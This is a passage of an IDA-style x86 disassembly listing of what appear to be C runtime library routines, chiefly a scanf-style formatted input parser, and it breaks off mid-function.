push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_4DBE84
call sub_4232A8
add esp, 20h
test eax, eax
jz short loc_420C0D
cmp eax, 1
jnz short loc_420C6F
movzx eax, [ebp+var_4]
jmp short loc_420C7C
; ---------------------------------------------------------------------------
loc_420C6F: ; CODE XREF: sub_420BB3+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_420C7C: ; CODE XREF: sub_420BB3+14�j
; sub_420BB3+1D�j ...
pop ebx
leave
retn
sub_420BB3 endp
; =============== S U B R O U T I N E =======================================
sub_420C7F proc near ; CODE XREF: sub_41C7BC+1D�p
; sub_41DC5E+16�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword_4DBDE0, ecx
mov eax, offset dword_43D190
loc_420C90: ; CODE XREF: sub_420C7F+1E�j
cmp ecx, [eax]
jz short loc_420CB4
add eax, 8
inc edx
cmp eax, offset asc_43D2F8 ; " \t-\r]"
jl short loc_420C90
cmp ecx, 13h
jb short loc_420CC1
cmp ecx, 24h
ja short loc_420CC1
mov dword_4DBDDC, 0Dh
retn
; ---------------------------------------------------------------------------
loc_420CB4: ; CODE XREF: sub_420C7F+13�j
mov eax, dword_43D194[edx*8]
mov dword_4DBDDC, eax
retn
; ---------------------------------------------------------------------------
loc_420CC1: ; CODE XREF: sub_420C7F+23�j
; sub_420C7F+28�j
cmp ecx, 0BCh
jb short loc_420CDB
cmp ecx, 0CAh
mov dword_4DBDDC, 8
jbe short locret_420CE5
loc_420CDB: ; CODE XREF: sub_420C7F+48�j
mov dword_4DBDDC, 16h
locret_420CE5: ; CODE XREF: sub_420C7F+5A�j
retn
sub_420C7F endp
; =============== S U B R O U T I N E =======================================
sub_420CE6 proc near ; CODE XREF: sub_41C7E6+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_42463D
test eax, eax
pop ecx
jz short loc_420D6F
cmp esi, offset dword_43D588
jnz short loc_420D04
xor eax, eax
jmp short loc_420D0F
; ---------------------------------------------------------------------------
loc_420D04: ; CODE XREF: sub_420CE6+18�j
cmp esi, offset dword_43D5A8
jnz short loc_420D6F
push 1
pop eax
loc_420D0F: ; CODE XREF: sub_420CE6+1C�j
inc dword_4DBFAC
test word ptr [esi+0Ch], 10Ch
jnz short loc_420D6F
cmp dword_4DBE50[eax*4], 0
push ebx
push edi
lea edi, ds:4DBE50h[eax*4]
mov ebx, 1000h
jnz short loc_420D55
push ebx
call sub_41BEB5
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_420D55
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_420D62
; ---------------------------------------------------------------------------
loc_420D55: ; CODE XREF: sub_420CE6+4D�j
; sub_420CE6+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_420D62: ; CODE XREF: sub_420CE6+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_420D6F: ; CODE XREF: sub_420CE6+10�j
; sub_420CE6+24�j ...
xor eax, eax
pop esi
retn
sub_420CE6 endp
; =============== S U B R O U T I N E =======================================
sub_420D73 proc near ; CODE XREF: sub_41C7E6+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_420D9D
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_420DAE
push esi
call sub_41E42B
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_420D9D: ; CODE XREF: sub_420D73+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_420DAE
push eax
call sub_41E42B
pop ecx
loc_420DAE: ; CODE XREF: sub_420D73+10�j
; sub_420D73+32�j
pop esi
retn
sub_420D73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420DB0 proc near ; CODE XREF: sub_41CCE3+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_4217B6
mov edi, [ebp+arg_0]
jmp short loc_420DDF
; ---------------------------------------------------------------------------
loc_420DDA: ; CODE XREF: sub_420DB0+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_420DDF: ; CODE XREF: sub_420DB0+28�j
cmp dword_43D084, 1
jle short loc_420DF7
movzx eax, al
push 8
push eax
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_420E06
; ---------------------------------------------------------------------------
loc_420DF7: ; CODE XREF: sub_420DB0+36�j
mov ecx, off_43CE78
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_420E06: ; CODE XREF: sub_420DB0+45�j
cmp eax, ebx
jz short loc_420E40
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_42183D
pop ecx
pop ecx
push eax
call sub_421826
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41DF10
add esp, 0Ch
loc_420E2E: ; CODE XREF: sub_420DB0+8E�j
test eax, eax
jz short loc_420E40
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41DF10
pop ecx
jmp short loc_420E2E
; ---------------------------------------------------------------------------
loc_420E40: ; CODE XREF: sub_420DB0+58�j
; sub_420DB0+80�j
cmp byte ptr [esi], 25h
jnz loc_421722
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_420E77: ; CODE XREF: sub_420DB0+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_43D084, 1
jle short loc_420E94
movzx eax, bl
push 4
push eax
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_420EA3
; ---------------------------------------------------------------------------
loc_420E94: ; CODE XREF: sub_420DB0+D3�j
mov ecx, off_43CE78
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_420EA3: ; CODE XREF: sub_420DB0+E2�j
test eax, eax
jz short loc_420EB9
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_420F1E
; ---------------------------------------------------------------------------
loc_420EB9: ; CODE XREF: sub_420DB0+F5�j
cmp ebx, 4Eh
jg short loc_420EFC
jz short loc_420F1E
cmp ebx, 2Ah
jz short loc_420EF7
cmp ebx, 46h
jz short loc_420F1E
cmp ebx, 49h
jz short loc_420ED9
cmp ebx, 4Ch
jnz short loc_420F0B
inc [ebp+var_D]
jmp short loc_420F1E
; ---------------------------------------------------------------------------
loc_420ED9: ; CODE XREF: sub_420DB0+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_420F0B
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_420F0B
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_420F1E
; ---------------------------------------------------------------------------
loc_420EF7: ; CODE XREF: sub_420DB0+113�j
inc [ebp+var_E]
jmp short loc_420F1E
; ---------------------------------------------------------------------------
loc_420EFC: ; CODE XREF: sub_420DB0+10C�j
cmp ebx, 68h
jz short loc_420F18
cmp ebx, 6Ch
jz short loc_420F10
cmp ebx, 77h
jz short loc_420F13
loc_420F0B: ; CODE XREF: sub_420DB0+122�j
; sub_420DB0+12D�j ...
inc [ebp+var_F]
jmp short loc_420F1E
; ---------------------------------------------------------------------------
loc_420F10: ; CODE XREF: sub_420DB0+154�j
inc [ebp+var_D]
loc_420F13: ; CODE XREF: sub_420DB0+159�j
inc [ebp+var_5]
jmp short loc_420F1E
; ---------------------------------------------------------------------------
loc_420F18: ; CODE XREF: sub_420DB0+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_420F1E: ; CODE XREF: sub_420DB0+107�j
; sub_420DB0+10E�j ...
cmp [ebp+var_F], 0
jz loc_420E77
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_420F43
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_420F43: ; CODE XREF: sub_420DB0+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_420F61
mov al, [esi]
cmp al, 53h
jz short loc_420F5D
cmp al, 43h
jz short loc_420F5D
or [ebp+var_5], 0FFh
jmp short loc_420F61
; ---------------------------------------------------------------------------
loc_420F5D: ; CODE XREF: sub_420DB0+1A1�j
; sub_420DB0+1A5�j
mov [ebp+var_5], 1
loc_420F61: ; CODE XREF: sub_420DB0+19B�j
; sub_420DB0+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_420F9A
cmp esi, 63h
jz short loc_420F8B
cmp esi, 7Bh
jz short loc_420F8B
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_42183D
pop ecx
jmp short loc_420F96
; ---------------------------------------------------------------------------
loc_420F8B: ; CODE XREF: sub_420DB0+1C5�j
; sub_420DB0+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42180C
loc_420F96: ; CODE XREF: sub_420DB0+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_420F9A: ; CODE XREF: sub_420DB0+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_420FAA
cmp [ebp+var_C], eax
jz loc_421786
loc_420FAA: ; CODE XREF: sub_420DB0+1EF�j
cmp esi, 6Fh
jg loc_421211
jz loc_4214C3
cmp esi, 63h
jz loc_4211EE
cmp esi, 64h
jz loc_4214C3
jle loc_42123B
cmp esi, 67h
jle short loc_42100E
cmp esi, 69h
jz short loc_420FF6
cmp esi, 6Eh
jnz loc_42123B
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_4216F1
jmp loc_421717
; ---------------------------------------------------------------------------
loc_420FF6: ; CODE XREF: sub_420DB0+229�j
push 64h
pop esi
loc_420FF9: ; CODE XREF: sub_420DB0+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_421283
mov [ebp+var_17], 1
jmp loc_421288
; ---------------------------------------------------------------------------
loc_42100E: ; CODE XREF: sub_420DB0+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_42102A
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_42102F
; ---------------------------------------------------------------------------
loc_42102A: ; CODE XREF: sub_420DB0+26A�j
cmp ebx, 2Bh
jnz short loc_421046
loc_42102F: ; CODE XREF: sub_420DB0+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_42180C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_421049
; ---------------------------------------------------------------------------
loc_421046: ; CODE XREF: sub_420DB0+27D�j
mov edi, [ebp+arg_0]
loc_421049: ; CODE XREF: sub_420DB0+294�j
cmp [ebp+var_20], 0
jz short loc_421058
cmp [ebp+var_C], 15Dh
jle short loc_42105F
loc_421058: ; CODE XREF: sub_420DB0+29D�j
mov [ebp+var_C], 15Dh
loc_42105F: ; CODE XREF: sub_420DB0+2A6�j
; sub_420DB0+2F2�j
cmp dword_43D084, 1
jle short loc_421074
push 4
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_42107F
; ---------------------------------------------------------------------------
loc_421074: ; CODE XREF: sub_420DB0+2B6�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 4
loc_42107F: ; CODE XREF: sub_420DB0+2C2�j
test eax, eax
jz short loc_4210A4
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_4210A4
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_42180C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42105F
; ---------------------------------------------------------------------------
loc_4210A4: ; CODE XREF: sub_420DB0+2D1�j
; sub_420DB0+2DB�j
cmp byte_43D088, bl
jnz short loc_421112
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_421112
inc [ebp+var_4]
push edi
call sub_42180C
mov ebx, eax
mov al, byte_43D088
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_4210CD: ; CODE XREF: sub_420DB0+360�j
cmp dword_43D084, 1
jle short loc_4210E2
push 4
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_4210ED
; ---------------------------------------------------------------------------
loc_4210E2: ; CODE XREF: sub_420DB0+324�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 4
loc_4210ED: ; CODE XREF: sub_420DB0+330�j
test eax, eax
jz short loc_421112
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_421112
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_42180C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_4210CD
; ---------------------------------------------------------------------------
loc_421112: ; CODE XREF: sub_420DB0+2FA�j
; sub_420DB0+304�j ...
cmp [ebp+var_1C], 0
jz loc_4211AA
cmp ebx, 65h
jz short loc_42112A
cmp ebx, 45h
jnz loc_4211AA
loc_42112A: ; CODE XREF: sub_420DB0+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_4211AA
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_42180C
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_421151
mov [esi], al
inc esi
jmp short loc_421156
; ---------------------------------------------------------------------------
loc_421151: ; CODE XREF: sub_420DB0+39A�j
cmp ebx, 2Bh
jnz short loc_421174
loc_421156: ; CODE XREF: sub_420DB0+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_421165
and [ebp+var_C], eax
jmp short loc_421174
; ---------------------------------------------------------------------------
loc_421165: ; CODE XREF: sub_420DB0+3AE�j
; sub_420DB0+3F8�j
inc [ebp+var_4]
push edi
call sub_42180C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_421174: ; CODE XREF: sub_420DB0+3A4�j
; sub_420DB0+3B3�j
cmp dword_43D084, 1
jle short loc_421189
push 4
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_421194
; ---------------------------------------------------------------------------
loc_421189: ; CODE XREF: sub_420DB0+3CB�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 4
loc_421194: ; CODE XREF: sub_420DB0+3D7�j
test eax, eax
jz short loc_4211AA
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_4211AA
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_421165
; ---------------------------------------------------------------------------
loc_4211AA: ; CODE XREF: sub_420DB0+366�j
; sub_420DB0+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_421826
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_4217B6
cmp [ebp+var_E], 0
jnz loc_421717
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_43D428
add esp, 0Ch
jmp loc_421717
; ---------------------------------------------------------------------------
loc_4211EE: ; CODE XREF: sub_420DB0+20C�j
cmp [ebp+var_20], eax
jnz short loc_4211FD
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_4211FD: ; CODE XREF: sub_420DB0+441�j
cmp [ebp+var_5], 0
jle short loc_421207
mov [ebp+var_16], 1
loc_421207: ; CODE XREF: sub_420DB0+451�j
mov edi, offset asc_43D300 ; "]"
jmp loc_42131C
; ---------------------------------------------------------------------------
loc_421211: ; CODE XREF: sub_420DB0+1FD�j
mov eax, esi
sub eax, 70h
jz loc_4214BF
sub eax, 3
jz loc_42130D
dec eax
dec eax
jz loc_4214C3
sub eax, 3
jz loc_420FF9
sub eax, 3
jz short loc_42125F
loc_42123B: ; CODE XREF: sub_420DB0+21B�j
; sub_420DB0+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_421786
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_421717
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_421717
; ---------------------------------------------------------------------------
loc_42125F: ; CODE XREF: sub_420DB0+489�j
cmp [ebp+var_5], 0
jle short loc_421269
mov [ebp+var_16], 1
loc_421269: ; CODE XREF: sub_420DB0+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_421320
mov eax, edi
lea edi, [eax+1]
jmp loc_42131C
; ---------------------------------------------------------------------------
loc_421283: ; CODE XREF: sub_420DB0+24F�j
cmp ebx, 2Bh
jnz short loc_4212AA
loc_421288: ; CODE XREF: sub_420DB0+259�j
dec [ebp+var_C]
jnz short loc_421299
cmp [ebp+var_20], 0
jz short loc_421299
mov [ebp+var_F], 1
jmp short loc_4212AA
; ---------------------------------------------------------------------------
loc_421299: ; CODE XREF: sub_420DB0+4DB�j
; sub_420DB0+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42180C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_4212AA: ; CODE XREF: sub_420DB0+4D6�j
; sub_420DB0+4E7�j
cmp ebx, 30h
jnz loc_4214F8
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42180C
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_4212F8
cmp bl, 58h
jz short loc_4212F8
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_4212E2
push 6Fh
loc_4212DC: ; CODE XREF: sub_420DB0+55B�j
pop esi
jmp loc_4214F8
; ---------------------------------------------------------------------------
loc_4212E2: ; CODE XREF: sub_420DB0+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_421826
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_4214F5
; ---------------------------------------------------------------------------
loc_4212F8: ; CODE XREF: sub_420DB0+517�j
; sub_420DB0+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42180C
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_4212DC
; ---------------------------------------------------------------------------
loc_42130D: ; CODE XREF: sub_420DB0+46F�j
cmp [ebp+var_5], 0
jle short loc_421317
mov [ebp+var_16], 1
loc_421317: ; CODE XREF: sub_420DB0+561�j
mov edi, offset asc_43D2F8 ; " \t-\r]"
loc_42131C: ; CODE XREF: sub_420DB0+45C�j
; sub_420DB0+4CE�j
or [ebp+var_18], 0FFh
loc_421320: ; CODE XREF: sub_420DB0+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_41BF70
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_421344
cmp byte ptr [edi], 5Dh
jnz short loc_421344
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_421347
; ---------------------------------------------------------------------------
loc_421344: ; CODE XREF: sub_420DB0+584�j
; sub_420DB0+589�j
mov dl, [ebp+var_35]
loc_421347: ; CODE XREF: sub_420DB0+592�j
; sub_420DB0+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_4213AC
inc edi
cmp al, 2Dh
jnz short loc_421393
test dl, dl
jz short loc_421393
mov cl, [edi]
cmp cl, 5Dh
jz short loc_421393
inc edi
cmp dl, cl
jnb short loc_421366
mov al, cl
jmp short loc_42136A
; ---------------------------------------------------------------------------
loc_421366: ; CODE XREF: sub_420DB0+5B0�j
mov al, dl
mov dl, cl
loc_42136A: ; CODE XREF: sub_420DB0+5B4�j
cmp dl, al
ja short loc_42138F
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_421377: ; CODE XREF: sub_420DB0+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_421377
loc_42138F: ; CODE XREF: sub_420DB0+5BC�j
xor dl, dl
jmp short loc_421347
; ---------------------------------------------------------------------------
loc_421393: ; CODE XREF: sub_420DB0+5A0�j
; sub_420DB0+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_421347
; ---------------------------------------------------------------------------
loc_4213AC: ; CODE XREF: sub_420DB0+59B�j
cmp byte ptr [edi], 0
jz loc_4217B6
cmp [ebp+var_3C], 7Bh
jnz short loc_4213BE
mov [ebp+arg_4], edi
loc_4213BE: ; CODE XREF: sub_420DB0+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_421826
pop ecx
pop ecx
loc_4213D5: ; CODE XREF: sub_420DB0+6BC�j
; sub_420DB0+6C4�j
cmp [ebp+var_20], 0
jz short loc_4213E9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_421485
loc_4213E9: ; CODE XREF: sub_420DB0+629�j
inc [ebp+var_4]
push edi
call sub_42180C
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_421479
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_421479
cmp [ebp+var_E], 0
jnz short loc_421471
cmp [ebp+var_16], 0
jz short loc_421466
mov ecx, off_43CE78
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_421445
inc [ebp+var_4]
push edi
call sub_42180C
pop ecx
mov [ebp+var_37], al
loc_421445: ; CODE XREF: sub_420DB0+686�j
push dword_43D084
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_4246CB
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_421469
; ---------------------------------------------------------------------------
loc_421466: ; CODE XREF: sub_420DB0+673�j
mov [esi], al
inc esi
loc_421469: ; CODE XREF: sub_420DB0+6B4�j
mov [ebp+var_2C], esi
jmp loc_4213D5
; ---------------------------------------------------------------------------
loc_421471: ; CODE XREF: sub_420DB0+66D�j
inc [ebp+var_30]
jmp loc_4213D5
; ---------------------------------------------------------------------------
loc_421479: ; CODE XREF: sub_420DB0+649�j
; sub_420DB0+667�j
dec [ebp+var_4]
push edi
push eax
call sub_421826
pop ecx
pop ecx
loc_421485: ; CODE XREF: sub_420DB0+633�j
cmp [ebp+var_30], esi
jz loc_4217B6
cmp [ebp+var_E], 0
jnz loc_421717
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_421717
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_4214B7
and word ptr [eax], 0
jmp loc_421717
; ---------------------------------------------------------------------------
loc_4214B7: ; CODE XREF: sub_420DB0+6FC�j
and byte ptr [eax], 0
jmp loc_421717
; ---------------------------------------------------------------------------
loc_4214BF: ; CODE XREF: sub_420DB0+466�j
mov [ebp+var_D], 1
loc_4214C3: ; CODE XREF: sub_420DB0+203�j
; sub_420DB0+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_4214D1
mov [ebp+var_17], 1
jmp short loc_4214D6
; ---------------------------------------------------------------------------
loc_4214D1: ; CODE XREF: sub_420DB0+719�j
cmp ebx, 2Bh
jnz short loc_4214F8
loc_4214D6: ; CODE XREF: sub_420DB0+71F�j
dec [ebp+var_C]
jnz short loc_4214E7
cmp [ebp+var_20], 0
jz short loc_4214E7
mov [ebp+var_F], 1
jmp short loc_4214F8
; ---------------------------------------------------------------------------
loc_4214E7: ; CODE XREF: sub_420DB0+729�j
; sub_420DB0+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42180C
pop ecx
mov ebx, eax
loc_4214F5: ; CODE XREF: sub_420DB0+543�j
mov [ebp+var_14], ebx
loc_4214F8: ; CODE XREF: sub_420DB0+4FD�j
; sub_420DB0+52D�j ...
cmp [ebp+var_30], 0
jz loc_421611
cmp [ebp+var_F], 0
jnz loc_4215EF
loc_42150C: ; CODE XREF: sub_420DB0+82C�j
cmp esi, 78h
jnz short loc_421560
cmp dword_43D084, 1
jle short loc_421529
push 80h
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_421536
; ---------------------------------------------------------------------------
loc_421529: ; CODE XREF: sub_420DB0+768�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 80h
loc_421536: ; CODE XREF: sub_420DB0+777�j
test eax, eax
jz loc_4215E1
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 4
pop ecx
call sub_4247A0
push ebx
mov [ebp+var_28], eax
mov [ebp+var_24], edx
call sub_4217D5
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_4215B3
; ---------------------------------------------------------------------------
loc_421560: ; CODE XREF: sub_420DB0+75F�j
cmp dword_43D084, 1
jle short loc_421575
push 4
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_421580
; ---------------------------------------------------------------------------
loc_421575: ; CODE XREF: sub_420DB0+7B7�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 4
loc_421580: ; CODE XREF: sub_420DB0+7C3�j
test eax, eax
jz short loc_4215E1
cmp esi, 6Fh
jnz short loc_42159E
cmp ebx, 38h
jge short loc_4215E1
mov eax, [ebp+var_28]
mov edx, [ebp+var_24]
push 3
pop ecx
call sub_4247A0
jmp short loc_4215AD
; ---------------------------------------------------------------------------
loc_42159E: ; CODE XREF: sub_420DB0+7D7�j
push 0
push 0Ah
push [ebp+var_24]
push [ebp+var_28]
call sub_41DB20
loc_4215AD: ; CODE XREF: sub_420DB0+7EC�j
mov [ebp+var_28], eax
mov [ebp+var_24], edx
loc_4215B3: ; CODE XREF: sub_420DB0+7AE�j
inc [ebp+var_1C]
lea eax, [ebx-30h]
cdq
add [ebp+var_28], eax
adc [ebp+var_24], edx
cmp [ebp+var_20], 0
jz short loc_4215CB
dec [ebp+var_C]
jz short loc_4215EF
loc_4215CB: ; CODE XREF: sub_420DB0+814�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42180C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_42150C
; ---------------------------------------------------------------------------
loc_4215E1: ; CODE XREF: sub_420DB0+788�j
; sub_420DB0+7D2�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_421826
pop ecx
pop ecx
loc_4215EF: ; CODE XREF: sub_420DB0+756�j
; sub_420DB0+819�j
cmp [ebp+var_17], 0
jz loc_4216D5
mov eax, [ebp+var_28]
mov ecx, [ebp+var_24]
neg eax
adc ecx, 0
mov [ebp+var_28], eax
neg ecx
mov [ebp+var_24], ecx
jmp loc_4216D5
; ---------------------------------------------------------------------------
loc_421611: ; CODE XREF: sub_420DB0+74C�j
cmp [ebp+var_F], 0
jnz loc_4216CD
loc_42161B: ; CODE XREF: sub_420DB0+90A�j
cmp esi, 78h
jz short loc_42165F
cmp esi, 70h
jz short loc_42165F
cmp dword_43D084, 1
jle short loc_42163A
push 4
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_421645
; ---------------------------------------------------------------------------
loc_42163A: ; CODE XREF: sub_420DB0+87C�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 4
loc_421645: ; CODE XREF: sub_420DB0+888�j
test eax, eax
jz short loc_4216BF
cmp esi, 6Fh
jnz short loc_421658
cmp ebx, 38h
jge short loc_4216BF
shl edi, 3
jmp short loc_421697
; ---------------------------------------------------------------------------
loc_421658: ; CODE XREF: sub_420DB0+89C�j
